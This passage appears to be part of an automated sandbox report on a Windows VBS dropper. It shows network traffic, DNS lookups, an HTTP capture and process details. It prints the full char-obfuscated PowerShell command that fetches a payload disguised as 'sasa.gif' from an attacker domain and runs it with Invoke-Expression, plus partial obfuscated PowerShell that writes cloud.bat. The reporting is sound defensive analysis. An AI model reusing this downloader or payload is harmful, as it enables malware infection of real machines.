                          Oct 12, 2024 16:41:01.748574972 CEST99995351088.119.175.153192.168.2.5
                          Oct 12, 2024 16:41:01.749943972 CEST535109999192.168.2.588.119.175.153
                          Oct 12, 2024 16:41:01.755039930 CEST99995351088.119.175.153192.168.2.5
                          Oct 12, 2024 16:41:01.931416988 CEST99995351088.119.175.153192.168.2.5
                          Oct 12, 2024 16:41:02.022109985 CEST99995351088.119.175.153192.168.2.5
                          Oct 12, 2024 16:41:02.022371054 CEST535109999192.168.2.588.119.175.153
                          Oct 12, 2024 16:41:02.024523973 CEST535109999192.168.2.588.119.175.153
                          Oct 12, 2024 16:41:02.029340029 CEST99995351088.119.175.153192.168.2.5
                          Oct 12, 2024 16:41:02.029808044 CEST535109999192.168.2.588.119.175.153
                          Oct 12, 2024 16:41:02.034775019 CEST99995351088.119.175.153192.168.2.5
                          Oct 12, 2024 16:41:03.806005955 CEST535109999192.168.2.588.119.175.153
                          Oct 12, 2024 16:41:03.810957909 CEST99995351088.119.175.153192.168.2.5
                          Oct 12, 2024 16:41:03.811045885 CEST535109999192.168.2.588.119.175.153
                          Oct 12, 2024 16:41:03.815895081 CEST99995351088.119.175.153192.168.2.5
                          Oct 12, 2024 16:41:03.992615938 CEST99995351088.119.175.153192.168.2.5
                          Oct 12, 2024 16:41:04.053184032 CEST535109999192.168.2.588.119.175.153
                          Oct 12, 2024 16:41:04.127089977 CEST99995351088.119.175.153192.168.2.5
                          Oct 12, 2024 16:41:04.128863096 CEST535109999192.168.2.588.119.175.153
                          Oct 12, 2024 16:41:04.133656979 CEST99995351088.119.175.153192.168.2.5
                          Oct 12, 2024 16:41:04.133719921 CEST535109999192.168.2.588.119.175.153
                          Oct 12, 2024 16:41:04.138480902 CEST99995351088.119.175.153192.168.2.5
                          Oct 12, 2024 16:41:12.493527889 CEST535109999192.168.2.588.119.175.153
                          Oct 12, 2024 16:41:12.499186993 CEST99995351088.119.175.153192.168.2.5
                          Oct 12, 2024 16:41:12.499301910 CEST535109999192.168.2.588.119.175.153
                          Oct 12, 2024 16:41:12.504143953 CEST99995351088.119.175.153192.168.2.5
                          Oct 12, 2024 16:41:12.714128017 CEST99995351088.119.175.153192.168.2.5
                          Oct 12, 2024 16:41:12.847151041 CEST99995351088.119.175.153192.168.2.5
                          Oct 12, 2024 16:41:12.847260952 CEST535109999192.168.2.588.119.175.153
                          Oct 12, 2024 16:41:12.848978996 CEST535109999192.168.2.588.119.175.153
                          Oct 12, 2024 16:41:12.853774071 CEST99995351088.119.175.153192.168.2.5
                          Oct 12, 2024 16:41:12.853852034 CEST535109999192.168.2.588.119.175.153
                          Oct 12, 2024 16:41:12.858669043 CEST99995351088.119.175.153192.168.2.5
                          Oct 12, 2024 16:41:16.542150021 CEST99995351088.119.175.153192.168.2.5
                          Oct 12, 2024 16:41:16.649275064 CEST535109999192.168.2.588.119.175.153
                          Oct 12, 2024 16:41:16.675260067 CEST99995351088.119.175.153192.168.2.5
                          Oct 12, 2024 16:41:16.836766005 CEST535109999192.168.2.588.119.175.153
                          Oct 12, 2024 16:41:17.602896929 CEST535109999192.168.2.588.119.175.153
                          Oct 12, 2024 16:41:17.607832909 CEST99995351088.119.175.153192.168.2.5
                          Oct 12, 2024 16:41:17.607901096 CEST535109999192.168.2.588.119.175.153
                          Oct 12, 2024 16:41:17.612909079 CEST99995351088.119.175.153192.168.2.5
                          Oct 12, 2024 16:41:17.783824921 CEST99995351088.119.175.153192.168.2.5
                          Oct 12, 2024 16:41:17.874610901 CEST99995351088.119.175.153192.168.2.5
                          Oct 12, 2024 16:41:17.874672890 CEST535109999192.168.2.588.119.175.153
                          Oct 12, 2024 16:41:17.877876043 CEST535109999192.168.2.588.119.175.153
                          Oct 12, 2024 16:41:17.882807016 CEST99995351088.119.175.153192.168.2.5
                          Oct 12, 2024 16:41:17.882863045 CEST535109999192.168.2.588.119.175.153
                          Oct 12, 2024 16:41:17.887825012 CEST99995351088.119.175.153192.168.2.5
                          Oct 12, 2024 16:41:21.665266037 CEST535109999192.168.2.588.119.175.153
                          Oct 12, 2024 16:41:21.670579910 CEST99995351088.119.175.153192.168.2.5
                          Oct 12, 2024 16:41:21.670665979 CEST535109999192.168.2.588.119.175.153
                          Oct 12, 2024 16:41:21.675651073 CEST99995351088.119.175.153192.168.2.5
                          Oct 12, 2024 16:41:21.881753922 CEST99995351088.119.175.153192.168.2.5
                          Oct 12, 2024 16:41:21.930495977 CEST535109999192.168.2.588.119.175.153
                          Oct 12, 2024 16:41:22.283411026 CEST99995351088.119.175.153192.168.2.5
                          Oct 12, 2024 16:41:22.284424067 CEST535109999192.168.2.588.119.175.153
                          Oct 12, 2024 16:41:22.493032932 CEST535109999192.168.2.588.119.175.153
                          Oct 12, 2024 16:41:22.616341114 CEST99995351088.119.175.153192.168.2.5
                          Oct 12, 2024 16:41:22.616416931 CEST535109999192.168.2.588.119.175.153
                          Oct 12, 2024 16:41:22.618643045 CEST99995351088.119.175.153192.168.2.5
                          Oct 12, 2024 16:41:22.618726015 CEST535109999192.168.2.588.119.175.153
                          Oct 12, 2024 16:41:22.619463921 CEST99995351088.119.175.153192.168.2.5
                          Oct 12, 2024 16:41:22.622438908 CEST99995351088.119.175.153192.168.2.5
                          Oct 12, 2024 16:41:22.623498917 CEST99995351088.119.175.153192.168.2.5
                          TimestampSource PortDest PortSource IPDest IP
                          Oct 12, 2024 16:39:22.224272013 CEST4933853192.168.2.51.1.1.1
                          Oct 12, 2024 16:39:22.279524088 CEST53493381.1.1.1192.168.2.5
                          Oct 12, 2024 16:39:30.875236034 CEST53589601.1.1.1192.168.2.5
                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                          Oct 12, 2024 16:39:22.224272013 CEST192.168.2.51.1.1.10xfa6bStandard query (0)varietydirectoutlet.comA (IP address)IN (0x0001)false
                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                          Oct 12, 2024 16:39:22.279524088 CEST1.1.1.1192.168.2.50xfa6bNo error (0)varietydirectoutlet.com122.201.127.73A (IP address)IN (0x0001)false
                          • varietydirectoutlet.com
                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          0192.168.2.549720122.201.127.734434844C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          TimestampBytes transferredDirectionData
                          2024-10-12 14:39:23 UTC87OUTGET /redro/sasa.gif HTTP/1.1
                          Host: varietydirectoutlet.com
                          Connection: Keep-Alive
                          2024-10-12 14:39:23 UTC235INHTTP/1.1 200 OK
                          Date: Sat, 12 Oct 2024 14:39:23 GMT
                          Server: Apache
                          Upgrade: h2,h2c
                          Connection: Upgrade, close
                          Last-Modified: Sun, 06 Oct 2024 16:02:48 GMT
                          Accept-Ranges: bytes
                          Content-Length: 1243696
                          Content-Type: image/gif
                          2024-10-12 14:39:23 UTC7957INData Raw: ff fe 0d 00 0a 00 73 00 45 00 54 00 2d 00 69 00 54 00 65 00 6d 00 20 00 28 00 27 00 56 00 61 00 27 00 2b 00 27 00 72 00 27 00 2b 00 27 00 69 00 61 00 62 00 27 00 2b 00 27 00 6c 00 45 00 27 00 2b 00 27 00 3a 00 73 00 6a 00 33 00 4f 00 47 00 27 00 29 00 20 00 28 00 5b 00 54 00 79 00 50 00 45 00 5d 00 28 00 22 00 7b 00 30 00 7d 00 7b 00 32 00 7d 00 7b 00 31 00 7d 00 22 00 2d 00 66 00 27 00 43 00 6f 00 27 00 2c 00 27 00 52 00 74 00 27 00 2c 00 27 00 6e 00 56 00 45 00 27 00 29 00 29 00 20 00 20 00 3b 00 20 00 20 00 20 00 24 00 7b 00 6b 00 60 00 35 00 4e 00 7d 00 3d 00 20 00 5b 00 74 00 59 00 70 00 45 00 5d 00 28 00 22 00 7b 00 31 00 7d 00 7b 00 32 00 7d 00 7b 00 30 00 7d 00 22 00 20 00 2d 00 66 00 20 00 27 00 69 00 4c 00 45 00 27 00 2c 00 27 00 69 00 4f 00 2e
                          Data Ascii: sET-iTem ('Va'+'r'+'iab'+'lE'+':sj3OG') ([TyPE]("{0}{2}{1}"-f'Co','Rt','nVE')) ; ${k`5N}= [tYpE]("{1}{2}{0}" -f 'iLE','iO.
                          2024-10-12 14:39:24 UTC8000INData Raw: 00 20 00 37 00 31 00 20 00 36 00 42 00 20 00 35 00 31 00 20 00 34 00 36 00 20 00 35 00 31 00 20 00 34 00 36 00 20 00 36 00 33 00 20 00 33 00 38 00 20 00 37 00 33 00 20 00 36 00 41 00 20 00 33 00 38 00 20 00 33 00 33 00 20 00 33 00 33 00 20 00 37 00 34 00 20 00 33 00 34 00 20 00 33 00 35 00 20 00 33 00 34 00 20 00 36 00 44 00 20 00 36 00 31 00 20 00 33 00 37 00 20 00 37 00 31 00 20 00 36 00 42 00 20 00 35 00 31 00 20 00 34 00 36 00 20 00 35 00 31 00 20 00 34 00 36 00 20 00 35 00 31 00 20 00 34 00 36 00 20 00 35 00 31 00 20 00 34 00 36 00 20 00 35 00 31 00 20 00 34 00 36 00 20 00 35 00 31 00 20 00 34 00 36 00 20 00 35 00 31 00 20 00 34 00 36 00 20 00 35 00 31 00 20 00 34 00 36 00 20 00 35 00 31 00 20 00 34 00 36 00 20 00 36 00 33 00 20 00 33 00 38 00 20 00
                          Data Ascii: 71 6B 51 46 51 46 63 38 73 6A 38 33 33 74 34 35 34 6D 61 37 71 6B 51 46 51 46 51 46 51 46 51 46 51 46 51 46 51 46 51 46 63 38
                          2024-10-12 14:39:24 UTC8000INData Raw: 00 36 00 44 00 20 00 36 00 41 00 20 00 36 00 45 00 20 00 37 00 36 00 20 00 37 00 33 00 20 00 37 00 39 00 20 00 37 00 35 00 20 00 37 00 32 00 20 00 36 00 42 00 20 00 36 00 41 00 20 00 37 00 31 00 20 00 36 00 42 00 20 00 36 00 43 00 20 00 36 00 45 00 20 00 36 00 37 00 20 00 37 00 33 00 20 00 36 00 46 00 20 00 36 00 43 00 20 00 37 00 38 00 20 00 36 00 37 00 20 00 37 00 31 00 20 00 37 00 35 00 20 00 37 00 36 00 20 00 36 00 33 00 20 00 37 00 31 00 20 00 36 00 46 00 20 00 36 00 45 00 20 00 36 00 41 00 20 00 36 00 39 00 20 00 36 00 36 00 20 00 36 00 38 00 20 00 36 00 46 00 20 00 36 00 38 00 20 00 37 00 39 00 20 00 36 00 33 00 20 00 36 00 34 00 20 00 37 00 30 00 20 00 36 00 44 00 20 00 36 00 41 00 20 00 37 00 33 00 20 00 36 00 43 00 20 00 37 00 39 00 20 00 37 00
                          Data Ascii: 6D 6A 6E 76 73 79 75 72 6B 6A 71 6B 6C 6E 67 73 6F 6C 78 67 71 75 76 63 71 6F 6E 6A 69 66 68 6F 68 79 63 64 70 6D 6A 73 6C 79 7
                          2024-10-12 14:39:24 UTC8000INData Raw: 00 38 00 20 00 36 00 43 00 20 00 37 00 30 00 20 00 37 00 30 00 20 00 36 00 35 00 20 00 36 00 33 00 20 00 37 00 41 00 20 00 37 00 39 00 20 00 37 00 32 00 20 00 30 00 44 00 20 00 30 00 41 00 20 00 34 00 34 00 20 00 36 00 39 00 20 00 36 00 44 00 20 00 32 00 30 00 20 00 37 00 41 00 20 00 36 00 39 00 20 00 37 00 37 00 20 00 36 00 34 00 20 00 36 00 33 00 20 00 36 00 36 00 20 00 36 00 41 00 20 00 36 00 34 00 20 00 36 00 38 00 20 00 36 00 31 00 20 00 36 00 41 00 20 00 37 00 32 00 20 00 36 00 31 00 20 00 37 00 30 00 20 00 36 00 39 00 20 00 37 00 34 00 20 00 37 00 37 00 20 00 36 00 31 00 20 00 37 00 37 00 20 00 36 00 35 00 20 00 37 00 31 00 20 00 36 00 32 00 20 00 37 00 39 00 20 00 36 00 43 00 20 00 36 00 41 00 20 00 37 00 39 00 20 00 36 00 33 00 20 00 37 00 37 00
                          Data Ascii: 8 6C 70 70 65 63 7A 79 72 0D 0A 44 69 6D 20 7A 69 77 64 63 66 6A 64 68 61 6A 72 61 70 69 74 77 61 77 65 71 62 79 6C 6A 79 63 77
                          2024-10-12 14:39:24 UTC8000INData Raw: 00 20 00 37 00 35 00 20 00 36 00 45 00 20 00 32 00 30 00 20 00 32 00 32 00 20 00 36 00 33 00 20 00 36 00 44 00 20 00 36 00 34 00 20 00 32 00 30 00 20 00 32 00 46 00 20 00 36 00 33 00 20 00 32 00 30 00 20 00 34 00 33 00 20 00 33 00 41 00 20 00 35 00 43 00 20 00 35 00 30 00 20 00 37 00 32 00 20 00 36 00 46 00 20 00 36 00 37 00 20 00 37 00 32 00 20 00 36 00 31 00 20 00 36 00 44 00 20 00 34 00 34 00 20 00 36 00 31 00 20 00 37 00 34 00 20 00 36 00 31 00 20 00 35 00 43 00 20 00 34 00 33 00 20 00 36 00 43 00 20 00 36 00 46 00 20 00 37 00 35 00 20 00 36 00 34 00 20 00 35 00 43 00 20 00 36 00 33 00 20 00 36 00 43 00 20 00 36 00 46 00 20 00 37 00 35 00 20 00 36 00 34 00 20 00 32 00 45 00 20 00 36 00 32 00 20 00 36 00 31 00 20 00 37 00 34 00 20 00 32 00 32 00 20 00
                          Data Ascii: 75 6E 20 22 63 6D 64 20 2F 63 20 43 3A 5C 50 72 6F 67 72 61 6D 44 61 74 61 5C 43 6C 6F 75 64 5C 63 6C 6F 75 64 2E 62 61 74 22
                          2024-10-12 14:39:24 UTC8000INData Raw: 00 27 00 41 00 27 00 2c 00 27 00 57 00 72 00 69 00 74 00 65 00 27 00 29 00 2e 00 49 00 6e 00 76 00 6f 00 6b 00 65 00 28 00 22 00 24 00 64 00 5c 00 63 00 6c 00 6f 00 75 00 64 00 2e 00 62 00 61 00 74 00 22 00 20 00 2c 00 20 00 24 00 7b 00 43 00 60 00 6f 00 6e 00 54 00 45 00 60 00 4e 00 74 00 7d 00 29 00 0d 00 0a 00 0d 00 0a 00 74 00 72 00 79 00 20 00 7b 00 0d 00 0a 00 24 00 7b 00 43 00 60 00 4f 00 6e 00 74 00 45 00 6e 00 74 00 7d 00 3d 00 40 00 27 00 0d 00 0a 00 0d 00 0a 00 24 00 7b 00 65 00 60 00 68 00 6d 00 7d 00 20 00 20 00 3d 00 20 00 20 00 5b 00 54 00 59 00 70 00 65 00 5d 00 28 00 22 00 7b 00 30 00 7d 00 7b 00 31 00 7d 00 22 00 20 00 2d 00 46 00 27 00 63 00 4f 00 27 00 2c 00 27 00 6e 00 76 00 45 00 52 00 54 00 27 00 29 00 3b 00 20 00 26 00 28 00 27 00
                          Data Ascii: 'A','Write').Invoke("$d\cloud.bat" , ${C`onTE`Nt})try {${C`OntEnt}=@'${e`hm} = [TYpe]("{0}{1}" -F'cO','nvERT'); &('
                          2024-10-12 14:39:24 UTC8000INData Raw: 00 2c 00 20 00 30 00 78 00 36 00 33 00 2c 00 20 00 30 00 78 00 45 00 42 00 2c 00 20 00 30 00 78 00 45 00 41 00 2c 00 20 00 30 00 78 00 34 00 31 00 2c 00 20 00 30 00 78 00 37 00 43 00 2c 00 20 00 30 00 78 00 37 00 44 00 2c 00 20 00 30 00 78 00 32 00 41 00 2c 00 20 00 30 00 78 00 44 00 43 00 2c 00 20 00 30 00 78 00 39 00 34 00 2c 00 20 00 30 00 78 00 44 00 34 00 2c 00 20 00 30 00 78 00 43 00 46 00 2c 00 20 00 30 00 78 00 45 00 34 00 2c 00 20 00 30 00 78 00 31 00 39 00 2c 00 20 00 30 00 78 00 41 00 46 00 2c 00 20 00 30 00 78 00 44 00 31 00 2c 00 20 00 30 00 78 00 41 00 31 00 2c 00 20 00 30 00 78 00 45 00 45 00 2c 00 20 00 30 00 78 00 31 00 42 00 2c 00 20 00 30 00 78 00 41 00 42 00 2c 00 20 00 30 00 78 00 41 00 44 00 2c 00 20 00 30 00 78 00 30 00 33 00 2c 00
                          Data Ascii: , 0x63, 0xEB, 0xEA, 0x41, 0x7C, 0x7D, 0x2A, 0xDC, 0x94, 0xD4, 0xCF, 0xE4, 0x19, 0xAF, 0xD1, 0xA1, 0xEE, 0x1B, 0xAB, 0xAD, 0x03,
                          2024-10-12 14:39:24 UTC8000INData Raw: 00 45 00 37 00 2c 00 20 00 30 00 78 00 45 00 31 00 2c 00 20 00 30 00 78 00 46 00 41 00 2c 00 20 00 30 00 78 00 39 00 32 00 2c 00 20 00 30 00 78 00 45 00 32 00 2c 00 20 00 30 00 78 00 36 00 45 00 2c 00 20 00 30 00 78 00 46 00 35 00 2c 00 20 00 30 00 78 00 37 00 42 00 2c 00 20 00 30 00 78 00 34 00 44 00 2c 00 20 00 30 00 78 00 34 00 41 00 2c 00 20 00 30 00 78 00 44 00 44 00 2c 00 20 00 30 00 78 00 31 00 36 00 2c 00 20 00 30 00 78 00 44 00 30 00 2c 00 20 00 30 00 78 00 30 00 33 00 2c 00 20 00 30 00 78 00 38 00 42 00 2c 00 20 00 30 00 78 00 39 00 32 00 2c 00 20 00 30 00 78 00 32 00 41 00 2c 00 20 00 30 00 78 00 42 00 31 00 2c 00 20 00 30 00 78 00 41 00 38 00 2c 00 20 00 30 00 78 00 37 00 35 00 2c 00 20 00 30 00 78 00 38 00 32 00 2c 00 20 00 30 00 78 00 38 00
                          Data Ascii: E7, 0xE1, 0xFA, 0x92, 0xE2, 0x6E, 0xF5, 0x7B, 0x4D, 0x4A, 0xDD, 0x16, 0xD0, 0x03, 0x8B, 0x92, 0x2A, 0xB1, 0xA8, 0x75, 0x82, 0x8
                          2024-10-12 14:39:24 UTC8000INData Raw: 00 30 00 78 00 41 00 32 00 2c 00 20 00 30 00 78 00 42 00 43 00 2c 00 20 00 30 00 78 00 43 00 45 00 2c 00 20 00 30 00 78 00 31 00 34 00 2c 00 20 00 30 00 78 00 43 00 37 00 2c 00 20 00 30 00 78 00 43 00 36 00 2c 00 20 00 30 00 78 00 31 00 33 00 2c 00 20 00 30 00 78 00 37 00 30 00 2c 00 20 00 30 00 78 00 37 00 44 00 2c 00 20 00 30 00 78 00 43 00 30 00 2c 00 20 00 30 00 78 00 45 00 35 00 2c 00 20 00 30 00 78 00 37 00 38 00 2c 00 20 00 30 00 78 00 42 00 36 00 2c 00 20 00 30 00 78 00 37 00 39 00 2c 00 20 00 30 00 78 00 46 00 43 00 2c 00 20 00 30 00 78 00 41 00 39 00 2c 00 20 00 30 00 78 00 41 00 45 00 2c 00 20 00 30 00 78 00 30 00 30 00 2c 00 20 00 30 00 78 00 31 00 34 00 2c 00 20 00 30 00 78 00 34 00 30 00 2c 00 20 00 30 00 78 00 38 00 32 00 2c 00 20 00 30 00
                          Data Ascii: 0xA2, 0xBC, 0xCE, 0x14, 0xC7, 0xC6, 0x13, 0x70, 0x7D, 0xC0, 0xE5, 0x78, 0xB6, 0x79, 0xFC, 0xA9, 0xAE, 0x00, 0x14, 0x40, 0x82, 0
                          2024-10-12 14:39:24 UTC8000INData Raw: 00 2c 00 20 00 30 00 78 00 36 00 38 00 2c 00 20 00 30 00 78 00 34 00 45 00 2c 00 20 00 30 00 78 00 44 00 44 00 2c 00 20 00 30 00 78 00 45 00 31 00 2c 00 20 00 30 00 78 00 31 00 42 00 2c 00 20 00 30 00 78 00 39 00 31 00 2c 00 20 00 30 00 78 00 34 00 46 00 2c 00 20 00 30 00 78 00 33 00 34 00 2c 00 20 00 30 00 78 00 31 00 43 00 2c 00 20 00 30 00 78 00 41 00 33 00 2c 00 20 00 30 00 78 00 44 00 35 00 2c 00 20 00 30 00 78 00 46 00 42 00 2c 00 20 00 30 00 78 00 37 00 33 00 2c 00 20 00 30 00 78 00 46 00 45 00 2c 00 20 00 30 00 78 00 31 00 30 00 2c 00 20 00 30 00 78 00 44 00 39 00 2c 00 20 00 30 00 78 00 30 00 31 00 2c 00 20 00 30 00 78 00 30 00 42 00 2c 00 20 00 30 00 78 00 36 00 30 00 2c 00 20 00 30 00 78 00 45 00 39 00 2c 00 20 00 30 00 78 00 41 00 46 00 2c 00
                          Data Ascii: , 0x68, 0x4E, 0xDD, 0xE1, 0x1B, 0x91, 0x4F, 0x34, 0x1C, 0xA3, 0xD5, 0xFB, 0x73, 0xFE, 0x10, 0xD9, 0x01, 0x0B, 0x60, 0xE9, 0xAF,


                          Click to jump to process

                          Click to jump to process

                          Click to dive into process behavior distribution

                          Click to jump to process

                          Target ID:0
                          Start time:10:39:10
                          Start date:12/10/2024
                          Path:C:\Windows\System32\wscript.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\H#0813-186765.vbs"
                          Imagebase:0x7ff6c7de0000
                          File size:170'496 bytes
                          MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          Target ID:2
                          Start time:10:39:15
                          Start date:12/10/2024
                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          Wow64 process (32bit):false
                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $var1 = $([char]([byte]0x20)+[char]([byte]0x5b)+[char]([byte]0x52)+[char]([byte]0x65)+[char]([byte]0x66)+[char]([byte]0x6c)+[char]([byte]0x65)+[char]([byte]0x63)+[char]([byte]0x74)+[char]([byte]0x69)+[char]([byte]0x6f)+[char]([byte]0x6e)+[char]([byte]0x2e)+[char]([byte]0x41)+[char]([byte]0x73)+[char]([byte]0x73)+[char]([byte]0x65)+[char]([byte]0x6d)+[char]([byte]0x62)+[char]([byte]0x6c)+[char]([byte]0x79)+[char]([byte]0x5d)+[char]([byte]0x3a)+[char]([byte]0x3a)+[char]([byte]0x6c)+[char]([byte]0x6f)+[char]([byte]0x61)+[char]([byte]0x64)+[char]([byte]0x77)+[char]([byte]0x69)+[char]([byte]0x74)+[char]([byte]0x68)+[char]([byte]0x50)+[char]([byte]0x61)+[char]([byte]0x72)+[char]([byte]0x74)+[char]([byte]0x69)+[char]([byte]0x61)+[char]([byte]0x6c)+[char]([byte]0x4e)+[char]([byte]0x61)+[char]([byte]0x6d)+[char]([byte]0x65)+[char]([byte]0x28)+[char]([byte]0x22)+[char]([byte]0x4d)+[char]([byte]0x69)+[char]([byte]0x63)+[char]([byte]0x72)+[char]([byte]0x6f)+[char]([byte]0x73)+[char]([byte]0x6f)+[char]([byte]0x66)+[char]([byte]0x74)+[char]([byte]0x2e)+[char]([byte]0x56)+[char]([byte]0x69)+[char]([byte]0x73)+[char]([byte]0x75)+[char]([byte]0x61)+[char]([byte]0x6c)+[char]([byte]0x42)+[char]([byte]0x61)+[char]([byte]0x73)+[char]([byte]0x69)+[char]([byte]0x63)+[char]([byte]0x22)+[char]([byte]0x29)+[char]([byte]0x20)+[char]([byte]0x7c)+[char]([byte]0x20)+[char]([byte]0x4f)+[char]([byte]0x75)+[char]([byte]0x74)+[char]([byte]0x2d)+[char]([byte]0x4e)+[char]([byte]0x75)+[char]([byte]0x6c)+[char]([byte]0x6c)+[char]([byte]0x20)+[char]([byte]0x3b)+[char]([byte]0x73)+[char]([byte]0x6c)+[char]([byte]0x65)+[char]([byte]0x65)+[char]([byte]0x70)+[char]([byte]0x20)+[char]([byte]0x2d)+[char]([byte]0x73)+[char]([byte]0x20)+[char]([byte]0x34)+[char]([byte]0x20)+[char]([byte]0x3b)+[char]([byte]0x20)+[char]([byte]0x24)+[char]([byte]0x76)+[char]([byte]0x61)+[char]([byte]0x72)+[char]([byte]0x20)+[char]([byte]0x3d)+[char]([byte]0x20)+[char]([byte]0x20)+[char]([byte]0x5b)+[char]([byte]0x4d)+[char]([byte]0x69)+[char]([byte]0x63)+[char]([byte]0x72)+[char]([byte]0x6f)+[char]([byte]0x73)+[char]([byte]0x6f)+[char]([byte]0x66)+[char]([byte]0x74)+[char]([byte]0x2e)+[char]([byte]0x56)+[char]([byte]0x69)+[char]([byte]0x73)+[char]([byte]0x75)+[char]([byte]0x61)+[char]([byte]0x6c)+[char]([byte]0x42)+[char]([byte]0x61)+[char]([byte]0x73)+[char]([byte]0x69)+[char]([byte]0x63)+[char]([byte]0x2e)+[char]([byte]0x49)+[char]([byte]0x6e)+[char]([byte]0x74)+[char]([byte]0x65)+[char]([byte]0x72)+[char]([byte]0x61)+[char]([byte]0x63)+[char]([byte]0x74)+[char]([byte]0x69)+[char]([byte]0x6f)+[char]([byte]0x6e)+[char]([byte]0x5d)+[char]([byte]0x3a)+[char]([byte]0x3a)+[char]([byte]0x43)+[char]([byte]0x61)+[char]([byte]0x6c)+[char]([byte]0x6c)+[char]([byte]0x62)+[char]([byte]0x79)+[char]([byte]0x6e)+[char]([byte]0x61)+[char]([byte]0x6d)+[char]([byte]0x65)+[char]([byte]0x28)+[char]([byte]0x28)+[char]([byte]0x4e)+[char]([byte]0x65)+[char]([byte]0x77)+[char]([byte]0x2d)+[char]([byte]0x6f)+[char]([byte]0x62)+[char]([byte]0x6a)+[char]([byte]0x65)+[char]([byte]0x63)+[char]([byte]0x74)+[char]([byte]0x20)+[char]([byte]0x6e)+[char]([byte]0x65)+[char]([byte]0x74)+[char]([byte]0x2e)+[char]([byte]0x77)+[char]([byte]0x65)+[char]([byte]0x62)+[char]([byte]0x63)+[char]([byte]0x6c)+[char]([byte]0x69)+[char]([byte]0x65)+[char]([byte]0x6e)+[char]([byte]0x74)+[char]([byte]0x20)+[char]([byte]0x29)+[char]([byte]0x20)+[char]([byte]0x2c)+[char]([byte]0x20)+[char]([byte]0x22)+[char]([byte]0x44)+[char]([byte]0x6f)+[char]([byte]0x77)+[char]([byte]0x6e)+[char]([byte]0x6c)+[char]([byte]0x6f)+[char]([byte]0x61)+[char]([byte]0x64)+[char]([byte]0x53)+[char]([byte]0x74)+[char]([byte]0x72)+[char]([byte]0x69)+[char]([byte]0x6e)+[char]([byte]0x67)+[char]([byte]0x22)+[char]([byte]0x20)+[char]([byte]0x2c)+[char]([byte]0x20)+[char]([byte]0x5b)+[char]([byte]0x4d)+[char]([byte]0x69)+[char]([byte]0x63)+[char]([byte]0x72)+[char]([byte]0x6f)+[char]([byte]0x73)+[char]([byte]0x6f)+[char]([byte]0x66)+[char]([byte]0x74)+[char]([byte]0x2e)+[char]([byte]0x56)+[char]([byte]0x69)+[char]([byte]0x73)+[char]([byte]0x75)+[char]([byte]0x61)+[char]([byte]0x6c)+[char]([byte]0x42)+[char]([byte]0x61)+[char]([byte]0x73)+[char]([byte]0x69)+[char]([byte]0x63)+[char]([byte]0x2e)+[char]([byte]0x43)+[char]([byte]0x61)+[char]([byte]0x6c)+[char]([byte]0x6c)+[char]([byte]0x54)+[char]([byte]0x79)+[char]([byte]0x70)+[char]([byte]0x65)+[char]([byte]0x5d)+[char]([byte]0x3a)+[char]([byte]0x3a)+[char]([byte]0x4d)+[char]([byte]0x65)+[char]([byte]0x74)+[char]([byte]0x68)+[char]([byte]0x6f)+[char]([byte]0x64)+[char]([byte]0x2c)+[char]([byte]0x20)+[char]([byte]0x22)+[char]([byte]0x68)+[char]([byte]0x74)+[char]([byte]0x74)+[char]([byte]0x70)+[char]([byte]0x73)+[char]([byte]0x3a)+[char]([byte]0x2f)+[char]([byte]0x2f)+[char]([byte]0x76)+[char]([byte]0x61)+[char]([byte]0x72)+[char]([byte]0x69)+[char]([byte]0x65)+[char]([byte]0x74)+[char]([byte]0x79)+[char]([byte]0x64)+[char]([byte]0x69)+[char]([byte]0x72)+[char]([byte]0x65)+[char]([byte]0x63)+[char]([byte]0x74)+[char]([byte]0x6f)+[char]([byte]0x75)+[char]([byte]0x74)+[char]([byte]0x6c)+[char]([byte]0x65)+[char]([byte]0x74)+[char]([byte]0x2e)+[char]([byte]0x63)+[char]([byte]0x6f)+[char]([byte]0x6d)+[char]([byte]0x2f)+[char]([byte]0x72)+[char]([byte]0x65)+[char]([byte]0x64)+[char]([byte]0x72)+[char]([byte]0x6f)+[char]([byte]0x2f)+[char]([byte]0x73)+[char]([byte]0x61)+[char]([byte]0x73)+[char]([byte]0x61)+[char]([byte]0x2e)+[char]([byte]0x67)+[char]([byte]0x69)+[char]([byte]0x66)+[char]([byte]0x22)+[char]([byte]0x20)+[char]([byte]0x29)) ; $var2 = $([char]([byte]0x26)+[char]([byte]0x28)+[char]([byte]0x67)+[char]([byte]0x63)+[char]([byte]0x6d)+[char]([byte]0x20)+[char]([byte]0x69)+[char]([byte]0x2a)+[char]([byte]0x2a)+[char]([byte]0x6e)+[char]([byte]0x76)+[char]([byte]0x2a)+[char]([byte]0x2a)+[char]([byte]0x2a)+[char]([byte]0x6f)+[char]([byte]0x6b)+[char]([byte]0x65)+[char]([byte]0x2d)+[char]([byte]0x65)+[char]([byte]0x78)+[char]([byte]0x70)+[char]([byte]0x72)+[char]([byte]0x2a)+[char]([byte]0x2a)+[char]([byte]0x69)+[char]([byte]0x6f)+[char]([byte]0x6e)+[char]([byte]0x29)) ; $var3 = $var1+ ' | ' +$var2; $sb1 = [scriptblock]::Create($var3).Invoke()
                          Imagebase:0x7ff7be880000
                          File size:452'608 bytes
                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          Target ID:3
                          Start time:10:39:15
                          Start date:12/10/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff6d64d0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          Target ID:5
                          Start time:10:39:30
                          Start date:12/10/2024
                          Path:C:\Windows\System32\schtasks.exe
                          Wow64 process (32bit):false
